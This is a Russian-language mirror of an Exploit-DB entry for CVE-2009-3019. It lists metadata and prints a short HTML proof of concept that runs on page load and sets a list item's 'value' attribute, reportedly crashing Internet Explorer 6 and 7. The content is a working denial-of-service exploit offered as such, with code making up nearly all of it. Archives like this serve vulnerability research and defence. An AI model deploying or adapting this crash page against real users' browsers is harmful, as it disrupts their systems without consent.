- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 9455
- Проверка EDB
-
- Пройдено
- Автор
- IRFAN ASRAR
- Тип уязвимости
- DOS
- Платформа
- WINDOWS
- CVE
- cve-2009-3019
- Дата публикации
- 2009-08-18
HTML:
<html>
<head>
<title> Irfan Asrar</title>
</head>
<body onload="c()">
Set Attribute Crash : Tested with IE7 Vista
IE6 XP2
IE6 XP3
<script type="text/javascript">
function c() {
var li = document.createElement("li");
li.setAttribute("value", "1");
li.value = "1";
}
</script>
</body>
</html>
# milw0rm.com [2009-08-18]
- Источник
- www.exploit-db.com